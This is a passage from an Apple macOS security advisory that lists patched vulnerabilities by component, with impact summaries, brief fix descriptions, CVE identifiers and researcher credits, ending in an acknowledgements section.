Description: A memory corruption issue was addressed with improved
input validation.
CVE-2020-27914: Yu Wang of Didi Research America
CVE-2020-27915: Yu Wang of Didi Research America
Entry added December 14, 2020
App Store
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to gain elevated privileges
Description: This issue was addressed by removing the vulnerable
code.
CVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab
Audio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light-
Year Lab
Audio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab
Audio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Audio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Bluetooth
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause unexpected application
termination or heap corruption
Description: Multiple integer overflows were addressed with improved
input validation.
CVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong
Security Lab
CoreAudio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light-
Year Lab
CVE-2020-27909: Anonymous working with Trend Micro Zero Day
Initiative, JunDong Xie and XingWei Lin of Ant Security Light-Year
Lab
CVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year
Lab
Entry added December 14, 2020
CoreAudio
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-10017: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Security Light-Year Lab
CoreCapture
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
CoreGraphics
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-9883: an anonymous researcher, Mickey Jin of Trend Micro
Crash Reporter
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local attacker may be able to elevate their privileges
Description: An issue existed within the path validation logic for
symlinks. This issue was addressed with improved path sanitization.
CVE-2020-10003: Tim Michaud (@TimGMichaud) of Leviathan
CoreText
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A logic issue was addressed with improved state
management.
CVE-2020-27922: Mickey Jin of Trend Micro
Entry added December 14, 2020
CoreText
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-9999: Apple
Entry updated December 14, 2020
Disk Images
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Finder
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Users may be unable to remove metadata indicating where files
were downloaded from
Description: The issue was addressed with additional user controls.
CVE-2020-27894: Manuel Trezza of Shuggr (shuggr.com)
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: A buffer overflow was addressed with improved size
validation.
CVE-2020-9962: Yiğit Can YILMAZ (@yilmazcanyigit)
Entry added December 14, 2020
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of
Trend Micro
Entry added December 14, 2020
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile
Security Research Team working with Trend Micro’s Zero Day Initiative
Entry added December 14, 2020
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed with improved input validation.
CVE-2020-27931: Apple
Entry added December 14, 2020
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font may lead to arbitrary
code execution. Apple is aware of reports that an exploit for this
issue exists in the wild.
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2020-27930: Google Project Zero
FontParser
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-27927: Xingwei Lin of Ant Security Light-Year Lab
Foundation
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local user may be able to read arbitrary files
Description: A logic issue was addressed with improved state
management.
CVE-2020-10002: James Hutchins
HomeKit
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An attacker in a privileged network position may be able to
unexpectedly alter application state
Description: This issue was addressed with improved setting
propagation.
CVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana
University Bloomington, Yan Jia of Xidian University and University
of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University
of Science and Technology
Entry added December 14, 2020
ImageIO
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security
Light-Year Lab
Entry added December 14, 2020
ImageIO
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-27924: Lei Sun
Entry added December 14, 2020
ImageIO
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab
CVE-2020-27923: Lei Sun
Entry updated December 14, 2020
ImageIO
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Intel Graphics Driver
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day
Initiative
CVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc.,
and Luyi Xing of Indiana University Bloomington
Entry added December 14, 2020
Intel Graphics Driver
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day
Initiative
Entry added December 14, 2020
Image Processing
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei
Lin of Ant Security Light-Year Lab
Entry added December 14, 2020
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2020-9967: Alex Plaskett (@alexjplaskett)
Entry added December 14, 2020
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9975: Tielei Wang of Pangu Lab
Entry added December 14, 2020
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A race condition was addressed with improved state
handling.
CVE-2020-27921: Linus Henze (pinauten.de)
Entry added December 14, 2020
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A logic issue existed resulting in memory corruption.
This was addressed with improved state management.
CVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqong
Security Lab
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An attacker in a privileged network position may be able to
inject into active connections within a VPN tunnel
Description: A routing issue was addressed with improved
restrictions.
CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R.
Crandall
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to disclose kernel
memory. Apple is aware of reports that an exploit for this issue
exists in the wild.
Description: A memory initialization issue was addressed.
CVE-2020-27950: Google Project Zero
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A logic issue was addressed with improved state
management.
CVE-2020-9974: Tommy Muir (@Muirey03)
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-10016: Alex Helie
Kernel
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges. Apple is aware of reports that an exploit for
this issue exists in the wild.
Description: A type confusion issue was addressed with improved state
handling.
CVE-2020-27932: Google Project Zero
libxml2
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing maliciously crafted web content may lead to code
execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-27917: found by OSS-Fuzz
CVE-2020-27920: found by OSS-Fuzz
Entry updated December 14, 2020
libxml2
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2020-27911: found by OSS-Fuzz
libxpc
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to elevate privileges
Description: A logic issue was addressed with improved validation.
CVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab
Entry added December 14, 2020
libxpc
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to break out of its
sandbox
Description: A parsing issue in the handling of directory paths was
addressed with improved path validation.
CVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab
Logging
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local attacker may be able to elevate their privileges
Description: A path handling issue was addressed with improved
validation.
CVE-2020-10010: Tommy Muir (@Muirey03)
Mail
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Messages
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9988: William Breuer of the Netherlands
CVE-2020-9989: von Brunn Media
Model I/O
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-10011: Aleksandar Nikolic of Cisco Talos
Entry added December 14, 2020
Model I/O
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-13524: Aleksandar Nikolic of Cisco Talos
Model I/O
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Opening a maliciously crafted file may lead to unexpected
application termination or arbitrary code execution
Description: A logic issue was addressed with improved state
management.
CVE-2020-10004: Aleksandar Nikolic of Cisco Talos
NetworkExtension
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to elevate privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and
Mickey Jin of Trend Micro
NSRemoteView
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A logic issue was addressed with improved restrictions.
CVE-2020-27901: Thijs Alkemade of Computest Research Division
Entry added December 14, 2020
NSRemoteView
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to preview files it does
not have access to
Description: An issue existed in the handling of snapshots. The issue
was resolved with improved permissions logic.
CVE-2020-27900: Thijs Alkemade of Computest Research Division
PCRE
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Multiple issues in pcre
Description: Multiple issues were addressed by updating to version
8.44.
CVE-2019-20838
CVE-2020-14155
Power Management
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A logic issue was addressed with improved state
management.
CVE-2020-10007: singi@theori working with Trend Micro Zero Day
Initiative
python
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Cookies belonging to one origin may be sent to another origin
Description: Multiple issues were addressed with improved logic.
CVE-2020-27896: an anonymous researcher
Quick Look
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious app may be able to determine the existence of
files on the computer
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security
Quick Look
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing a maliciously crafted document may lead to a cross
site scripting attack
Description: An access issue was addressed with improved access
restrictions.
CVE-2020-10012: Heige of KnownSec 404 Team
(https://www.knownsec.com/) and Bo Qu of Palo Alto Networks
(https://www.paloaltonetworks.com/)
Ruby
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to modify the file system
Description: A path handling issue was addressed with improved
validation.
CVE-2020-27896: an anonymous researcher
Ruby
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: When parsing certain JSON documents, the json gem can be
coerced into creating arbitrary objects in the target system
Description: This issue was addressed with improved checks.
CVE-2020-10663: Jeremy Evans
Safari
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Visiting a malicious website may lead to address bar spoofing
Description: A spoofing issue existed in the handling of URLs. This
issue was addressed with improved input validation.
CVE-2020-9945: Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India)
@imnarendrabhati
Safari
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to determine a user's
open tabs in Safari
Description: A validation issue existed in the entitlement
verification. This issue was addressed with improved validation of
the process entitlement.
CVE-2020-9977: Josh Parnham (@joshparnham)
Safari
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2020-9942: an anonymous researcher, Rahul d Kankrale
(servicenger.com), Rayyan Bijoora (@Bijoora) of The City School, PAF
Chapter, Ruilin Yang of Tencent Security Xuanwu Lab, YoKo Kho
(@YoKoAcc) of PT Telekomunikasi Indonesia (Persero) Tbk, Zhiyang
Zeng(@Wester) of OPPO ZIWU Security Lab
Sandbox
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-9991
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
SQLite
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-13630
Symptom Framework
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A local attacker may be able to elevate their privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-27899: 08Tc3wBB working with ZecOps
Entry added December 14, 2020
System Preferences
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A logic issue was addressed with improved state
management.
CVE-2020-10009: Thijs Alkemade of Computest Research Division
TCC
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application with root privileges may be able to
access private information
Description: A logic issue was addressed with improved restrictions.
CVE-2020-10008: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added December 14, 2020
WebKit
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-27918: Liu Long of Ant Security Light-Year Lab
Entry updated December 14, 2020
Wi-Fi
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: An attacker may be able to bypass Managed Frame Protection
Description: A denial of service issue was addressed with improved
state handling.
CVE-2020-27898: Stephan Marais of University of Johannesburg
Xsan
Available for: Mac Pro (2013 and later), MacBook Air (2013 and
later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),
iMac (2014 and later), MacBook (2015 and later), iMac Pro (all
models)
Impact: A malicious application may be able to access restricted
files
Description: This issue was addressed with improved entitlements.
CVE-2020-10006: Wojciech Reguła (@_r3ggi) of SecuRing
Additional recognition
802.1X
We would like to acknowledge Kenana Dalle of Hamad bin Khalifa
University and Ryan Riley of Carnegie Mellon University in Qatar for
their assistance.
Entry added December 14, 2020
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab, an anonymous researcher for their
assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group, Dennis Heinze
(@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their
assistance.
Entry updated December 14, 2020
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
Crash Reporter
We would like to acknowledge Artur Byszko of AFINE for their
assistance.
Entry added December 14, 2020
Directory Utility
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing
for their assistance.
iAP
